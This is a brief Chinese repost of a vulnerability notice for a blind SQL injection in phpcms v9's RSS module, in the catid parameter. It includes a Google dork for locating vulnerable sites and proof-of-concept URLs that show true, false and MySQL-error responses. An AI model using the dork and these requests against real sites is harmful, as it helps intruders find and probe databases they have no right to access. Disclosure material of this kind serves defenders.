欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

phpcms V9 BLind SQL 注入漏洞0day

程序员文章站 2022-07-10 10:34:35
  影响版本:phpcms v9 blind  phpcms v9 blind 参数过滤存在SQL注入漏洞。... 11-03-11...

  影响版本:phpcms v9 blind

  官方网站:http://www.phpcms.cn

  漏洞类型:sql注入

  漏洞描述:phpcms v9 blind 参数过滤存在sql注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10 <= true

  [!] http://host/index.php?m=content&c=rss&catid=-10 <= false

  [+] http://host/index.php?m=content&c=rss&catid=5 <= show mysql error (table)